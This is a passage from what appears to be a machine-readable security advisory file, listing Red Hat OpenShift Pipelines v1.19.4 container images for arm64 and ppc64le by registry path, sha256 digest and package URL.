"product_id": "registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-sidecarlogresults-rhel9@sha256%3A412cfc5996d64b54df1c0a67be28991d28a6a92812e4f890f735a219f53fabe2?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845278"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-webhook-rhel9@sha256%3A7ea98459bc424770c56ea071d3f9e4656bc944cd1932e8ed2581b263021a2bdc?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845382"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:cdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-workingdirinit-rhel9@sha256%3Acdf4cf8b73bf4d7445aca34f522aebaa778a996b674359186650c20da6e936c0?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845202"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-pruner-controller-rhel9@sha256%3A7067b2346190b5b6a060c03bf4b4c249a0f80081c05392f5657384b223436fa8?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764774996"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-results-api-rhel9@sha256%3A9c5423a3ca6643833e5fa31725627e188225956d2d06fa68c0ff1f84a237e83c?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764775225"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-results-retention-policy-agent-rhel9@sha256:27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-results-retention-policy-agent-rhel9@sha256%3A27898aeea13f6905416da9dc611f9812fe6f9fa0dd6a23f346416199c689ff73?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764775225"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-results-watcher-rhel9@sha256:f4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-results-watcher-rhel9@sha256%3Af4a1cd38d8588eca71a4e5a8836962b3ccab355fff8b716c3249428fea0e28be?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764635259"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-triggers-controller-rhel9@sha256:3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-triggers-controller-rhel9@sha256%3A3c8e2ac02103cd8634f0e6bdcbe6f5d1466aefe4403a63bc6f9e7bd3893c3c88?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764769550"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-triggers-core-interceptors-rhel9@sha256:c85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-triggers-core-interceptors-rhel9@sha256%3Ac85d4e0135de82a1a88d2c1420d9d75577e3d09044b246952c44970bfb87aef3?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764769552"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-triggers-eventlistenersink-rhel9@sha256:57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-triggers-eventlistenersink-rhel9@sha256%3A57dd3a2b54bf4ce9292498846ea37d6efec0a3c028743c267e69390101b46a4d?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764769677"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-triggers-webhook-rhel9@sha256:41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-triggers-webhook-rhel9@sha256%3A41f7fea02b1f40d528316ecf020ff082e0d927e044adc643dbbe14e65faf91f2?arch=arm64\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764769674"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-console-plugin-rhel9@sha256:9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-console-plugin-rhel9@sha256%3A9317d326fc72e99e821a4891e115007761d326f33ee85dbfe3cc62be801d5af6?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764771718"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-controller-rhel9@sha256:03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-manual-approval-gate-controller-rhel9@sha256%3A03423a987a3b154dd097d2f207c33928ed184aa27b884a3e3c5e56702d049f12?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764777983"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-manual-approval-gate-webhook-rhel9@sha256:7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-manual-approval-gate-webhook-rhel9@sha256%3A7df869f57b816a2bd15d6a15dd9101d0e7aa7664c8bfaf9148a82379a1839b49?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764771736"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-cli-rhel9@sha256:1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-pipelines-as-code-cli-rhel9@sha256%3A1591e38eae1b07ce0fc75a9eb60d97126fb7d36eddd5746686e4570fb1b81427?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764830200"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-controller-rhel9@sha256:3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-pipelines-as-code-controller-rhel9@sha256%3A3ba0b8bb577b4b14bd16eaa04e450edffbe15841d60f77f6a6541065bec9a28c?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764830290"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-watcher-rhel9@sha256:05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-pipelines-as-code-watcher-rhel9@sha256%3A05b517f49080df8cb3943b891c9a13023745df90e0ed99e93c1e3f481fa20e61?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764830107"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-pipelines-as-code-webhook-rhel9@sha256:5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-pipelines-as-code-webhook-rhel9@sha256%3A5d63e10ac42b901f0293f192f1a96b30158617fed722e9df4b302a7824e8f8c0?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764830289"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-cache-rhel9@sha256:914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-cache-rhel9@sha256%3A914e831a771ccb36b6ef46bf4ced2c05ce2a76a538b3a6785cf047d1782c354c?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764771720"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-chains-controller-rhel9@sha256:01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-chains-controller-rhel9@sha256%3A01d0bac5ae68324714889caad7a6d00974a194706dd6abac16ac600c1acba486?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764771272"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-git-init-rhel9@sha256:03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-git-init-rhel9@sha256%3A03ff8b2feccd7a7fc5b93574042def602fa885e572919674fccb1e516bd6969f?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764942761"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-hub-api-rhel9@sha256:ddbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-hub-api-rhel9@sha256%3Addbbfea6d40e0b978a0715f338aacc758c82a47df12a4ecd46c0ab9ed5bac166?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764818880"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-hub-db-migration-rhel9@sha256:6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-hub-db-migration-rhel9@sha256%3A6183a74cf4b9c2abbd6511cb94151308f724c85dc63aaea0ae795712f8d48254?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764819005"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-hub-ui-rhel9@sha256:bf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-hub-ui-rhel9@sha256%3Abf65b6fad64b2761ed6997a1cad0a6f0477b2740561011b30717d0d3f3dd6b7f?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764819019"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-controller-rhel9@sha256:dbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-controller-rhel9@sha256%3Adbf71dcf74dd47cbfc5f285640aca82afa3686e98ef32bc025dd3d047d636671?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845239"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-entrypoint-rhel9@sha256:7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-entrypoint-rhel9@sha256%3A7b2e55ea36197d0e733baea29aa6671ec5b0055a1f58fabb5269d31bf04d8045?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845346"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-events-rhel9@sha256:169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-events-rhel9@sha256%3A169b8f0623a6a15aefb7217228197218b4ab9a398cbab01348f9045599c38a57?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845294"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-nop-rhel9@sha256:64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-nop-rhel9@sha256%3A64932159dfd4db8724b2762c421eae8b9e7ab9f1e50bd7e4d2a0f4f45c69d007?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845253"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-resolvers-rhel9@sha256:61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-resolvers-rhel9@sha256%3A61110ee679b63f7261463b8fcb2d218bdb53e960b1f8531401fd8f6b84470bdb?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845383"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-sidecarlogresults-rhel9@sha256:edba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-sidecarlogresults-rhel9@sha256%3Aedba5b2a803930afc23735a0d3379aea0fceed51af27cc0cf38142d543f8c4f5?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845278"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-webhook-rhel9@sha256:ae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-webhook-rhel9@sha256%3Aae8a6df4961b5fa37165369a45d16a2850582464c509bc2f5ff56a6f69c75c35?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845382"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-workingdirinit-rhel9@sha256:a41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-workingdirinit-rhel9@sha256%3Aa41064dbf7979a87e55aa13842da7b38f0eca58e530e1245650e53b120f3b1b5?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764845202"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-pruner-controller-rhel9@sha256:c7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-pruner-controller-rhel9@sha256%3Ac7ef1a29c57398fe47d62b129448d55a322d2ee2e04a4930ef7c324e870e884c?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764774996"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le",
"product_id": "registry.redhat.io/openshift-pipelines/pipelines-results-api-rhel9@sha256:8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/pipelines-results-api-rhel9@sha256%3A8a3e77bbe30a6d572d4121a9ff110cdaae889c2b742f10b471b2a23bea8b17b4?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-pipelines\u0026tag=v1.19.4-1764775225"
}
}
},
{
"category": "product_version",
